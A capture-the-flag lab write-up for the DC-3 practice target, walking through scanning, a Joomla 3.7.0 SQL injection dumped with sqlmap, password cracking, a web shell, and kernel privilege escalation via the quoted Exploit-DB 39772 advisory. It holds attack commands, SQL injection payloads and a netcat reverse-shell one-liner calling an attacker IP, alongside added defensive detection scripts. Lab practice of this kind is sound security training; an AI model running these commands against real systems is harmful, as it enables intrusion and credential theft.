DC3 lab practice

Goal: this target has one flag file; find it.


I. Information gathering

1. Identify the host and target IP

The target IP is confirmed as 192.168.101.51.

2. Port scan

Only port 80 is open.

3. Sensitive directory scan

dirb http://192.168.101.51/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr  9 07:19:18 2023
URL_BASE: http://192.168.101.51/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.101.51/ ----
==> DIRECTORY: http://192.168.101.51/administrator/                                                                                                                                                             
==> DIRECTORY: http://192.168.101.51/bin/                                                                                                                                                                       
==> DIRECTORY: http://192.168.101.51/cache/                                                                                                                                                                     
==> DIRECTORY: http://192.168.101.51/components/                                                                                                                                                                
==> DIRECTORY: http://192.168.101.51/images/                                                                                                                                                                    
==> DIRECTORY: http://192.168.101.51/includes/                                                                                                                                                                  
+ http://192.168.101.51/index.php (CODE:200|SIZE:7109)                                                                                                                                                          
==> DIRECTORY: http://192.168.101.51/language/                                                                                                                                                                  
==> DIRECTORY: http://192.168.101.51/layouts/                                                                                                                                                                   
==> DIRECTORY: http://192.168.101.51/libraries/                                                                                                                                                                 
==> DIRECTORY: http://192.168.101.51/media/                                                                                                                                                                     
==> DIRECTORY: http://192.168.101.51/modules/                                                                                                                                                                   
==> DIRECTORY: http://192.168.101.51/plugins/                                                                                                                                                                   
+ http://192.168.101.51/server-status (CODE:403|SIZE:302)                                                                                                                                                       
==> DIRECTORY: http://192.168.101.51/templates/                                                                                                                                                                 
==> DIRECTORY: http://192.168.101.51/tmp/                                                                                                                                                                       
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/ ----
==> DIRECTORY: http://192.168.101.51/administrator/cache/                                                                                                                                                       
==> DIRECTORY: http://192.168.101.51/administrator/components/                                                                                                                                                  
==> DIRECTORY: http://192.168.101.51/administrator/help/                                                                                                                                                        
==> DIRECTORY: http://192.168.101.51/administrator/includes/                                                                                                                                                    
+ http://192.168.101.51/administrator/index.php (CODE:200|SIZE:4803)                                                                                                                                            
==> DIRECTORY: http://192.168.101.51/administrator/language/                                                                                                                                                    
==> DIRECTORY: http://192.168.101.51/administrator/logs/                                                                                                                                                        
==> DIRECTORY: http://192.168.101.51/administrator/modules/                                                                                                                                                     
==> DIRECTORY: http://192.168.101.51/administrator/templates/                                                                                                                                                   
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/bin/ ----
+ http://192.168.101.51/bin/index.html (CODE:200|SIZE:31)                                                                                                                                                       
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/cache/ ----
+ http://192.168.101.51/cache/index.html (CODE:200|SIZE:31)                                                                                                                                                     
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/components/ ----
+ http://192.168.101.51/components/index.html (CODE:200|SIZE:31)                                                                                                                                                
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/images/ ----
==> DIRECTORY: http://192.168.101.51/images/banners/                                                                                                                                                            
==> DIRECTORY: http://192.168.101.51/images/headers/                                                                                                                                                            
+ http://192.168.101.51/images/index.html (CODE:200|SIZE:31)                                                                                                                                                    
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/includes/ ----
+ http://192.168.101.51/includes/index.html (CODE:200|SIZE:31)                                                                                                                                                  
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/language/ ----
+ http://192.168.101.51/language/index.html (CODE:200|SIZE:31)                                                                                                                                                  
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/layouts/ ----
+ http://192.168.101.51/layouts/index.html (CODE:200|SIZE:31)                                                                                                                                                   
==> DIRECTORY: http://192.168.101.51/layouts/joomla/                                                                                                                                                            
==> DIRECTORY: http://192.168.101.51/layouts/libraries/                                                                                                                                                         
==> DIRECTORY: http://192.168.101.51/layouts/plugins/                                                                                                                                                           
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/libraries/ ----
==> DIRECTORY: http://192.168.101.51/libraries/cms/                                                                                                                                                             
+ http://192.168.101.51/libraries/index.html (CODE:200|SIZE:31)                                                                                                                                                 
==> DIRECTORY: http://192.168.101.51/libraries/joomla/                                                                                                                                                          
==> DIRECTORY: http://192.168.101.51/libraries/legacy/                                                                                                                                                          
+ http://192.168.101.51/libraries/vendor (CODE:403|SIZE:305)                                                                                                                                                    
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/media/ ----
==> DIRECTORY: http://192.168.101.51/media/cms/                                                                                                                                                                 
==> DIRECTORY: http://192.168.101.51/media/contacts/                                                                                                                                                            
==> DIRECTORY: http://192.168.101.51/media/editors/                                                                                                                                                             
+ http://192.168.101.51/media/index.html (CODE:200|SIZE:31)                                                                                                                                                     
==> DIRECTORY: http://192.168.101.51/media/mailto/                                                                                                                                                              
==> DIRECTORY: http://192.168.101.51/media/media/                                                                                                                                                               
==> DIRECTORY: http://192.168.101.51/media/system/                                                                                                                                                              
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/modules/ ----
+ http://192.168.101.51/modules/index.html (CODE:200|SIZE:31)                                                                                                                                                   
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/ ----
==> DIRECTORY: http://192.168.101.51/plugins/authentication/                                                                                                                                                    
==> DIRECTORY: http://192.168.101.51/plugins/captcha/                                                                                                                                                           
==> DIRECTORY: http://192.168.101.51/plugins/content/                                                                                                                                                           
==> DIRECTORY: http://192.168.101.51/plugins/editors/                                                                                                                                                           
==> DIRECTORY: http://192.168.101.51/plugins/extension/                                                                                                                                                         
==> DIRECTORY: http://192.168.101.51/plugins/fields/                                                                                                                                                            
+ http://192.168.101.51/plugins/index.html (CODE:200|SIZE:31)                                                                                                                                                   
==> DIRECTORY: http://192.168.101.51/plugins/installer/                                                                                                                                                         
==> DIRECTORY: http://192.168.101.51/plugins/search/                                                                                                                                                            
==> DIRECTORY: http://192.168.101.51/plugins/system/                                                                                                                                                            
==> DIRECTORY: http://192.168.101.51/plugins/user/                                                                                                                                                              
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/templates/ ----
+ http://192.168.101.51/templates/index.html (CODE:200|SIZE:31)                                                                                                                                                 
==> DIRECTORY: http://192.168.101.51/templates/system/                                                                                                                                                          
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/tmp/ ----
+ http://192.168.101.51/tmp/index.html (CODE:200|SIZE:31)                                                                                                                                                       
==> DIRECTORY: http://192.168.101.51/tmp/packages/                                                                                                                                                              
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/cache/ ----
+ http://192.168.101.51/administrator/cache/index.html (CODE:200|SIZE:31)                                                                                                                                       
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/logs/ ----
+ http://192.168.101.51/administrator/logs/index.html (CODE:200|SIZE:31)                                                                                                                                        
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/administrator/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/images/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/images/headers/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/layouts/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/layouts/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/layouts/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/libraries/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/libraries/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/libraries/legacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/media/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/media/contacts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/media/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/media/mailto/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/media/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/media/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/authentication/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/captcha/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/extension/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/fields/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/plugins/user/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/templates/system/ ----
==> DIRECTORY: http://192.168.101.51/templates/system/css/                                                                                                                                                      
==> DIRECTORY: http://192.168.101.51/templates/system/html/                                                                                                                                                     
==> DIRECTORY: http://192.168.101.51/templates/system/images/                                                                                                                                                   
+ http://192.168.101.51/templates/system/index.php (CODE:200|SIZE:0)                                                                                                                                            
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/tmp/packages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/templates/system/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/templates/system/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://192.168.101.51/templates/system/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Apr  9 07:20:14 2023
DOWNLOADED: 83016 - FOUND: 20

 

The scan found the admin back-end directory.


II. Vulnerability detection

nmap --script=vuln -p 80 192.168.101.51       
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-09 07:24 EDT
Nmap scan report for 192.168.101.51
Host is up (0.00043s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.101.51
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.101.51:80/
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.101.51:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=reset.request&Itemid=101
|     
|     Path: http://192.168.101.51:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.101.51:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|     
|     Path: http://192.168.101.51:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.101.51:80/index.php
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.101.51:80/index.php/2-uncategorised/1-welcome
|     Form id: login-form
|_    Form action: /index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
|   /language/en-GB/en-GB.xml: Joomla version 3.7.0
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2017-8917: 
|   VULNERABLE:
|   Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-8917
|     Risk factor: High  CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
|       An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
|       to execute aribitrary SQL commands via unspecified vectors.
|       
|     Disclosure date: 2017-05-17
|     Extra information:
|       User: root@localhost
|     References:
|       https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
MAC Address: 00:0C:29:C4:EF:66 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 320.82 seconds

The scan turned up two vulnerabilities: CVE-2007-6750 and CVE-2017-8917.


III. Exploitation

Search for the vulnerability in MSF

Search Exploit-DB for the vulnerability

cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap: 

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)  

Enumerate the databases:

sqlmap -u "http://192.168.101.51/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Enumerate the tables:

sqlmap -u "http://192.168.101.51/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

Enumerate the columns:

sqlmap -u "http://192.168.101.51/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T #__users --columns -p list[fullordering]

Dump the usernames and passwords:

sqlmap -u "http://192.168.101.51/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D 'joomladb' -T '#__users' -C "username,password" --dump
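From the defender's side, the same vulnerable parameter gives a simple detection: the following is an added example (not from the original post or from Joomla) that flags CVE-2017-8917 probes in Apache combined-format access logs; only option=com_fields and list[fullordering] come from the page, and the log entries are constructed.

```python
"""Flag CVE-2017-8917 (Joomla 3.7.0 com_fields SQL injection) probes in
Apache combined-format access logs.

Added example for this write-up; not part of the original post or of Joomla.
Only the vulnerable parameter (option=com_fields, list[fullordering]) comes
from the page; the log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# SQL constructs seen in the sqlmap payloads and the bare updatexml probe above.
_SQLI_MARKERS = ("updatexml", "extractvalue", "sleep(", "case when",
                 "floor(rand(", "select ", "union ", "information_schema")


def decode_fullordering(target):
    """Return the decoded list[fullordering] value of a com_fields request, else None."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option") != ["com_fields"]:
        return None
    values = params.get("list[fullordering]")
    # parse_qs already decoded once; decode again to defeat double-encoding.
    return unquote_plus(values[0]) if values else None


def is_cve_2017_8917_probe(log_line):
    """True if the request carries a list[fullordering] value that is not a plain ordering."""
    m = _REQ_RE.search(log_line)
    if not m:
        return False
    value = decode_fullordering(m.group("target"))
    if value is None:
        return False
    lowered = value.lower()
    # Legitimate values look like "a.ordering ASC": no quotes, no parentheses,
    # no SQL keywords. Anything else is treated as a probe.
    if "'" in lowered or "(" in lowered:
        return True
    return any(marker in lowered for marker in _SQLI_MARKERS)


# Constructed sample entries (addresses and timestamps are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Apr/2023:07:30:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 1234',
    '10.0.0.5 - - [09/Apr/2023:07:30:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29GDiu%29 HTTP/1.1" 200 5000',
    '10.0.0.9 - - [09/Apr/2023:07:31:00 +0000] "GET /administrator/index.php?option=com_fields&view=fields&list[fullordering]=a.ordering+ASC HTTP/1.1" 200 8000',
    '10.0.0.9 - - [09/Apr/2023:07:31:05 +0000] "GET /index.php/2-uncategorised/1-welcome HTTP/1.1" 200 7109',
]
```

Run it over a real access log with `[ln for ln in open(path) if is_cve_2017_8917_probe(ln)]`; upgrading past Joomla 3.7.0 remains the actual fix.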

Crack the password hash with john

Recovered credentials: username admin, password snoopy

Log in to the admin back-end

Plant a one-line web shell

Connect to it with AntSword (中国蚁剑)


IV. Privilege escalation

Spawn a reverse shell to keep a persistent connection

Escalate privileges

Check the kernel version and the distribution release:

cat /proc/version
cat /etc/issue

Kernel version: Linux version 4.4.0-21

Distribution: Ubuntu 16.04

Filtering the candidate exploits: first drop the .c entries, since C sources are more cumbersome to use, then filter by the OS version; only 39772.txt is left.

39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

	/* look for pseudo eBPF instructions that access map FDs and
	 * replace them with actual map pointers
	 */
	static int replace_map_fd_with_map_ptr(struct verifier_env *env)
	{
		struct bpf_insn *insn = env->prog->insnsi;
		int insn_cnt = env->prog->len;
		int i, j;

		for (i = 0; i < insn_cnt; i++, insn++) {
			[checks for bad instructions]

			if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
				struct bpf_map *map;
				struct fd f;

				[checks for bad instructions]

				f = fdget(insn->imm);
				map = __bpf_map_get(f);
				if (IS_ERR(map)) {
					verbose("fd %d is not pointing to valid bpf_map\n",
						insn->imm);
					fdput(f);
					return PTR_ERR(map);
				}

				[...]
			}
		}
		[...]
	}


__bpf_map_get contains the following code:

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
	if (!f.file)
		return ERR_PTR(-EBADF);
	if (f.file->f_op != &bpf_map_fops) {
		fdput(f);
		return ERR_PTR(-EINVAL);
	}

	return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.


One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip    

Download link

Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

That link is not reachable, so look it up directly on the official site instead.

Contents of the file downloaded from the official site

Approach: upload exploit.tar from that download to a writable directory on the target, unpack it (it contains compile.sh and doubleput), and run those two scripts.
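For the defending side, the advisory quoted above states two preconditions (kernel 4.4 or newer, kernel.unprivileged_bpf_disabled not set to 1). The following added check (not from the original post or the Exploit-DB entry) applies them to a /proc/version line and the sysctl value; DC3_PROC_VERSION is a constructed sample modelled on the target, and the value 2 is treated as mitigated because newer kernels use it for "disabled and locked".

```python
"""Check whether a host meets the two preconditions the advisory above states
for the eBPF double-fdput bug (Exploit-DB 39772): kernel 4.4 or newer and
kernel.unprivileged_bpf_disabled not set.

Added example, not part of the original write-up. It only applies those two
conditions; it does not know whether the fix commit is backported, so treat
"exposed" as "verify patch level", not as proof of vulnerability.
"""
import re
from pathlib import Path

_VERSION_RE = re.compile(r"Linux version (\d+)\.(\d+)(?:\.(\d+))?")


def kernel_tuple(proc_version):
    """Parse the text of /proc/version into (major, minor, patch)."""
    m = _VERSION_RE.search(proc_version)
    if not m:
        raise ValueError("unrecognised /proc/version line")
    return tuple(int(x or 0) for x in m.groups())


def assess(proc_version, unprivileged_bpf_disabled):
    """Return 'not-affected', 'mitigated' or 'exposed' per the advisory's conditions."""
    if kernel_tuple(proc_version) < (4, 4, 0):
        return "not-affected"            # advisory: affects Linux >= 4.4
    # 1 blocks unprivileged bpf(); newer kernels also accept 2 (locked off).
    if unprivileged_bpf_disabled.strip() in ("1", "2"):
        return "mitigated"
    return "exposed"


def assess_live_host():
    """Assess the machine this runs on; None where /proc is unavailable."""
    try:
        version = Path("/proc/version").read_text()
        sysctl = Path("/proc/sys/kernel/unprivileged_bpf_disabled").read_text()
    except OSError:
        return None
    return assess(version, sysctl)


# Constructed sample modelled on the target's output (Ubuntu 16.04, 4.4.0-21).
DC3_PROC_VERSION = "Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1) #37-Ubuntu SMP"

if __name__ == "__main__":
    print("DC-3 target:", assess(DC3_PROC_VERSION, "0"))
    print("this host:", assess_live_host())
```

Setting `kernel.unprivileged_bpf_disabled=1` via sysctl closes the entry point the advisory describes even before the kernel is updated.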


V. Summary

1. The Exploit-DB vulnerability database

2. The john tool

3. When nc has no -e option, use rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker-ip> <port> > /tmp/f instead.

How it works:

        1. rm /tmp/f: first remove the temporary file f to avoid a conflict with an existing one (the semicolon after it means the following commands run one after another).

        2. mkfifo /tmp/f: mkfifo is the Linux command for creating a named pipe. You can create the pipe in one terminal, feed a command into it, and receive it in another terminal (with the redirection operator < you can keep receiving, e.g. cat < tmpfile).
